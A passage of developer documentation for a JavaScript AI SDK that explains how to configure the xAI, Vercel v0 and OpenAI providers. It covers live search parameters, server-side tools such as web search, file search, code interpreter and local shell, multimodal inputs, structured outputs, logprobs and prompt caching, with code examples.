    code_execution: xai.tools.codeExecution(),
  },
});

File Search Tool

xAI supports file search through OpenAI compatibility. You can use the OpenAI provider with xAI's base URL to search vector stores:

import { createOpenAI } from '@ai-sdk/openai';
import { streamText } from 'ai';

const openai = createOpenAI({
  baseURL: 'https://api.x.ai/v1',
  apiKey: process.env.XAI_API_KEY,
});

const result = streamText({
  model: openai('grok-4'),
  prompt: 'What documents do you have access to?',
  tools: {
    file_search: openai.tools.fileSearch({
      vectorStoreIds: ['your-vector-store-id'],
      maxNumResults: 5,
    }),
  },
});

Multiple Tools

You can combine multiple server-side tools for comprehensive research:

import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';

const { fullStream } = streamText({
  model: xai.responses('grok-4-fast'),
  prompt: 'Research AI safety developments and calculate risk metrics',
  tools: {
    web_search: xai.tools.webSearch(),
    x_search: xai.tools.xSearch(),
    code_execution: xai.tools.codeExecution(),
  },
});

for await (const part of fullStream) {
  if (part.type === 'text-delta') {
    process.stdout.write(part.text);
  } else if (part.type === 'source' && part.sourceType === 'url') {
    console.log('\nSource:', part.url);
  }
}

Provider Options

The Responses API supports the following provider options:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const result = await generateText({
  model: xai.responses('grok-4-fast'),
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    },
  },
  // ...
});

The following provider options are available:

reasoningEffort 'low' | 'high'

Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.

Live Search

xAI models support Live Search functionality, allowing them to query real-time data from various sources and include it in responses with citations.

Basic Search

To enable search, specify searchParameters with a search mode:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'What are the latest developments in AI?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto', // 'auto', 'on', or 'off'
        returnCitations: true,
        maxSearchResults: 5,
      },
    },
  },
});

console.log(text);
console.log('Sources:', sources);

Search Parameters

The following search parameters are available:

mode 'auto' | 'on' | 'off'

Search mode preference:
- 'auto' (default): Model decides whether to search
- 'on': Always enables search
- 'off': Disables search completely
returnCitations boolean

Whether to return citations in the response. Defaults to true.
fromDate string

Start date for search data in ISO8601 format (YYYY-MM-DD).
toDate string

End date for search data in ISO8601 format (YYYY-MM-DD).
maxSearchResults number

Maximum number of search results to consider. Defaults to 20, max 50.
sources Array<SearchSource>

Data sources to search from. Defaults to ["web", "x"] if not specified.

Search Sources

You can specify different types of data sources for search:

Web Search

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Best ski resorts in Switzerland',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'web',
            country: 'CH', // ISO alpha-2 country code
            allowedWebsites: ['ski.com', 'snow-forecast.com'],
            safeSearch: true,
          },
        ],
      },
    },
  },
});

Web source parameters

country string: ISO alpha-2 country code
allowedWebsites string[]: Max 5 allowed websites
excludedWebsites string[]: Max 5 excluded websites
safeSearch boolean: Enable safe search (default: true)

X (Twitter) Search

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Latest updates on Grok AI',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'x',
            includedXHandles: ['grok', 'xai'],
            excludedXHandles: ['openai'],
            postFavoriteCount: 10,
            postViewCount: 100,
          },
        ],
      },
    },
  },
});

X source parameters

includedXHandles string[]: Array of X handles to search (without @ symbol)
excludedXHandles string[]: Array of X handles to exclude from search (without @ symbol)
postFavoriteCount number: Minimum favorite count of the X posts to consider.
postViewCount number: Minimum view count of the X posts to consider.

News Search

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Recent tech industry news',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'news',
            country: 'US',
            excludedWebsites: ['tabloid.com'],
            safeSearch: true,
          },
        ],
      },
    },
  },
});

News source parameters

country string: ISO alpha-2 country code
excludedWebsites string[]: Max 5 excluded websites
safeSearch boolean: Enable safe search (default: true)

RSS Feed Search

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Latest status updates',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        sources: [
          {
            type: 'rss',
            links: ['https://status.x.ai/feed.xml'],
          },
        ],
      },
    },
  },
});

RSS source parameters

links string[]: Array of RSS feed URLs (max 1 currently supported)

Multiple Sources

You can combine multiple data sources in a single search:

const result = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'Comprehensive overview of recent AI breakthroughs',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'on',
        returnCitations: true,
        maxSearchResults: 15,
        sources: [
          {
            type: 'web',
            allowedWebsites: ['arxiv.org', 'openai.com'],
          },
          {
            type: 'news',
            country: 'US',
          },
          {
            type: 'x',
            includedXHandles: ['openai', 'deepmind'],
          },
        ],
      },
    },
  },
});

Sources and Citations

When search is enabled with returnCitations: true, the response includes sources that were used to generate the answer:

const { text, sources } = await generateText({
  model: xai('grok-3-latest'),
  prompt: 'What are the latest developments in AI?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto',
        returnCitations: true,
      },
    },
  },
});

// Access the sources used
for (const source of sources) {
  if (source.sourceType === 'url') {
    console.log('Source:', source.url);
  }
}

Streaming with Search

Live Search works with streaming responses. Citations are included when the stream completes:

import { streamText } from 'ai';

const result = streamText({
  model: xai('grok-3-latest'),
  prompt: 'What has happened in tech recently?',
  providerOptions: {
    xai: {
      searchParameters: {
        mode: 'auto',
        returnCitations: true,
      },
    },
  },
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log('Sources:', await result.sources);

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Reasoning
`grok-4-fast-non-reasoning`
`grok-4-fast-reasoning`
`grok-code-fast-1`
`grok-4`
`grok-3`
`grok-3-latest`
`grok-3-fast`
`grok-3-fast-latest`
`grok-3-mini`
`grok-3-mini-latest`
`grok-3-mini-fast`
`grok-3-mini-fast-latest`
`grok-2`
`grok-2-latest`
`grok-2-1212`
`grok-2-vision`
`grok-2-vision-latest`
`grok-2-vision-1212`
`grok-beta`
`grok-vision-beta`

Image Models

You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: xai.image('grok-2-image'),
  prompt: 'A futuristic cityscape at sunset',
});

Model-specific options

You can customize the image generation behavior with model-specific settings:

import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: xai.image('grok-2-image'),
  prompt: 'A futuristic cityscape at sunset',
  maxImagesPerCall: 5, // Default is 10
  n: 2, // Generate 2 images
});

Model Capabilities

Model	Sizes	Notes
`grok-2-image`	1024x768 (default)	xAI's text-to-image generation model, designed to create high-quality images from text prompts. It's trained on a diverse dataset and can generate images across various styles, subjects, and settings.

title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.

Vercel Provider

The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.

You can create your Vercel API key at v0.dev.

Features

Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
Auto-fix: Identifies and corrects common coding issues during generation
Quick edit: Streams inline edits as they're available
Multimodal: Supports both text and image inputs

Setup

The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:

Provider Instance

You can import the default provider instance vercel from @ai-sdk/vercel:

import { vercel } from '@ai-sdk/vercel';

If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:

import { createVercel } from '@ai-sdk/vercel';

const vercel = createVercel({
  apiKey: process.env.VERCEL_API_KEY ?? '',
});

You can use the following optional settings to customize the Vercel provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vercel('v0-1.0-md'),
  prompt: 'Create a Next.js AI chatbot',
});

Vercel language models can also be used in the streamText function (see AI SDK Core).

Models

v0-1.5-md

The v0-1.5-md model is for everyday tasks and UI generation.

v0-1.5-lg

The v0-1.5-lg model is for advanced thinking or reasoning.

v0-1.0-md (legacy)

The v0-1.0-md model is the legacy model served by the v0 API.

All v0 models have the following capabilities:

Supports text and image inputs (multimodal)
Supports function/tool calls
Streaming responses with low latency
Optimized for frontend and full-stack web development

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`v0-1.5-md`
`v0-1.5-lg`
`v0-1.0-md`

title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.

OpenAI Provider

The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.

Setup

The OpenAI provider is available in the @ai-sdk/openai module. You can install it with

Provider Instance

You can import the default provider instance openai from @ai-sdk/openai:

import { openai } from '@ai-sdk/openai';

If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:

import { createOpenAI } from '@ai-sdk/openai';

const openai = createOpenAI({
  // custom settings, e.g.
  headers: {
    'header-name': 'header-value',
  },
});

You can use the following optional settings to customize the OpenAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
name string

The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
organization string

OpenAI Organization.
project string

OpenAI project.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

The OpenAI provider instance is a function that you can invoke to create a language model:

const model = openai('gpt-5');

It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:

const model = openai('gpt-5', {
  // additional settings
});

The available options depend on the API that's automatically chosen for the model (see below). If you want to explicitly select a specific model API, you can use .responses, .chat, or .completion.

Example

You can use OpenAI language models to generate text with the generateText function:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Responses Models

You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).

const model = openai('gpt-5');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAIResponsesProviderOptions type.

import { openai, OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'), // or openai.responses('gpt-5')
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAIResponsesProviderOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean

Whether to store the generation. Defaults to true.
maxToolCalls integer The maximum number of total calls to built-in tools that can be processed in a response. This maximum number applies across all built-in tool calls, not per individual tool. Any further attempts to call a tool by the model will be ignored.
metadata Record<string, string> Additional metadata to store with the generation.
conversation string The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with previousResponseId. Defaults to undefined.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to false.
serviceTier 'auto' | 'flex' | 'priority' | 'default' Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
textVerbosity 'low' | 'medium' | 'high' Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to 'medium'.
include Array<string> Specifies additional content to include in the response. Supported values: ['file_search_call.results'] for including file search results in responses. ['message.output_text.logprobs'] for logprobs. Defaults to undefined.
truncation string The truncation strategy to use for the model response.
- Auto: If the input to this Response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
- disabled (default): If the input size will exceed the context window size for a model, the request will fail with a 400 error.
promptCacheKey string A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h' The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.

The OpenAI responses provider also returns provider-specific metadata:

const { providerMetadata } = await generateText({
  model: openai.responses('gpt-5'),
});

const openaiMetadata = providerMetadata?.openai;

The following OpenAI-specific metadata is returned:

responseId string The ID of the response. Can be used to continue a conversation.
cachedPromptTokens number The number of prompt tokens that were a cache hit.
reasoningTokens number The number of reasoning tokens that the model generated.

Reasoning Output

For reasoning models like gpt-5, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    },
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'auto',
    },
  },
});
console.log('Reasoning:', result.reasoning);

Learn more about reasoning summaries in the OpenAI documentation.

Verbosity Control

You can control the length and detail of model responses using the textVerbosity parameter:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5-mini'),
  prompt: 'Write a poem about a boy and his first pet dog.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
    },
  },
});

The textVerbosity parameter scales output length without changing the underlying prompt:

'low': Produces terse, minimal responses
'medium': Balanced detail (default)
'high': Verbose responses with comprehensive detail

Web Search Tool

The OpenAI responses API supports web search through the openai.tools.webSearch tool.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search: openai.tools.webSearch({
      // optional configuration:
      externalWebAccess: true,
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search' },
});

// URL sources
const sources = result.sources;

For detailed information on configuration options see the OpenAI Web Search Tool documentation.

File Search Tool

The OpenAI responses API supports file search through the openai.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: openai.tools.fileSearch({
      vectorStoreIds: ['vs_123'],
      // configuration below is optional:
      maxNumResults: 5,
      filters: {
        key: 'author',
        type: 'eq',
        value: 'Jane Smith',
      },
      ranking: {
        ranker: 'auto',
        scoreThreshold: 0.5,
      },
    }),
  },
  providerOptions: {
    openai: {
      // optional: include results
      include: ['file_search_call.results'],
    } satisfies OpenAIResponsesProviderOptions,
  },
});

Image Generation Tool

OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

You can use the image tool with either generateText or streamText:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({
      outputFormat: 'webp',
      quality: 'low',
    }),
  },
});

for await (const part of result.fullStream) {
  if (part.type == 'tool-result' && !part.dynamic) {
    const base64Image = part.output.result;
  }
}

For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:

Image generation overview and models: OpenAI Image Generation
Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options

Code Interpreter Tool

The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: openai.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['file-123', 'file-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

Local Shell Tool

The OpenAI responses API support the local shell tool for Codex models through the openai.tools.localShell tool. Local shell is a tool that allows agents to run shell commands locally on a machine you or the user provides.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5-codex'),
  tools: {
    local_shell: openai.tools.localShell({
      execute: async ({ action }) => {
        // ... your implementation, e.g. sandbox access ...
        return { output: stdout };
      },
    }),
  },
  prompt: 'List the files in my home directory.',
  stopWhen: stepCountIs(2),
});

Image Inputs

The OpenAI Responses API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: fs.readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass a file-id from the OpenAI Files API.

{
  type: 'image',
  image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF Inputs

The OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a pdf.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

The model will have access to the contents of the PDF file and respond to questions about it. The PDF file should be passed using the data field, and the mediaType should be set to 'application/pdf'.

Structured Outputs

// Using generateObject
const result = await generateObject({
  model: openai('gpt-4.1'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(
        z.object({
          name: z.string(),
          amount: z.string(),
        }),
      ),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

// Using generateText
const result = await generateText({
  model: openai('gpt-4.1'),
  prompt: 'How do I make a pizza?',
  experimental_output: Output.object({
    schema: z.object({
      ingredients: z.array(z.string()),
      steps: z.array(z.string()),
    }),
  }),
});

Chat Models

const model = openai.chat('gpt-5');

OpenAI chat models support also some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import { openai, type OpenAIChatLanguageModelOptions } from '@ai-sdk/openai';

const model = openai.chat('gpt-5');

await generateText({
  model,
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAIChatLanguageModelOptions,
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'

Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
structuredOutputs boolean

Whether to use structured outputs. Defaults to true.

When enabled, tool calls and object generation will be strict and follow the provided schema.
maxCompletionTokens number

Maximum number of completion tokens to generate. Useful for reasoning models.
store boolean

Whether to enable persistence in Responses API.
metadata Record<string, string>

Metadata to associate with the request.
prediction Record<string, any>

Parameters for prediction mode.
serviceTier 'auto' | 'flex' | 'priority' | 'default'

Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
strictJsonSchema boolean

Whether to use strict JSON schema validation. Defaults to false.
textVerbosity 'low' | 'medium' | 'high'

Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.
promptCacheKey string

A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h'

The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string

A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.

Reasoning

OpenAI has introduced the o1,o3, and o4 series of reasoning models. Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The models codex-mini-latest and computer-use-preview are available only via the responses API.

Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.

They support additional settings and response metadata:

You can use providerOptions to set
- the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
You can use response providerMetadata to access the number of reasoning tokens that the model generated.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    },
  },
});

console.log(text);
console.log('Usage:', {
  ...usage,
  reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});

Structured Outputs

Structured outputs are enabled by default. You can disable them by setting the structuredOutputs option to false.

import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: openai.chat('gpt-4o-2024-08-06'),
  providerOptions: {
    openai: {
      structuredOutputs: false,
    },
  },
  schemaName: 'recipe',
  schemaDescription: 'A recipe for lasagna.',
  schema: z.object({
    name: z.string(),
    ingredients: z.array(
      z.object({
        name: z.string(),
        amount: z.string(),
      }),
    ),
    steps: z.array(z.string()),
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(JSON.stringify(result.object, null, 2));

For example, optional schema properties are not supported. You need to change Zod .nullish() and .optional() to .nullable().

Logprobs

OpenAI provides logprobs information for completion/chat models. You can access it in the providerMetadata object.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    openai: {
      // this can also be a number,
      // refer to logprobs provider options section for more
      logprobs: true,
    },
  },
});

const openaiMetadata = (await result.providerMetadata)?.openai;

const logprobs = openaiMetadata?.logprobs;

Image Support

The OpenAI Chat API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: fs.readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF support

The OpenAI Chat API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a PDF.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

Predicted Outputs

const result = streamText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: 'Replace the Username property with an Email property.',
    },
    {
      role: 'user',
      content: existingCode,
    },
  ],
  providerOptions: {
    openai: {
      prediction: {
        type: 'content',
        content: existingCode,
      },
    },
  },
});

OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens). You can access it in the providerMetadata object.

const openaiMetadata = (await result.providerMetadata)?.openai;

const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;

Image Detail

You can use the openai provider option to set the image input detail to high, low, or auto:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the image in detail.' },
        {
          type: 'image',
          image:
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/comic-cat.png?raw=true',

          // OpenAI specific options - image detail:
          providerOptions: {
            openai: { imageDetail: 'low' },
          },
        },
      ],
    },
  ],
});

Distillation

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';

async function main() {
  const { text, usage } = await generateText({
    model: openai.chat('gpt-4o-mini'),
    prompt: 'Who worked on the original macintosh?',
    providerOptions: {
      openai: {
        store: true,
        metadata: {
          custom: 'value',
        },
      },
    },
  });

  console.log(text);
  console.log();
  console.log('Usage:', usage);
}

main().catch(console.error);

Prompt Caching

OpenAI has introduced Prompt Caching for supported models including gpt-4o and gpt-4o-mini.

Prompt caching is automatically enabled for these models, when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
You can use response providerMetadata to access the number of prompt tokens that were a cache hit.
Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-4o-mini'),
  prompt: `A 1024-token or longer prompt...`,
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

To improve cache hit rates, you can manually control caching using the promptCacheKey option:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
    },
  },
});

console.log(`usage:`, {
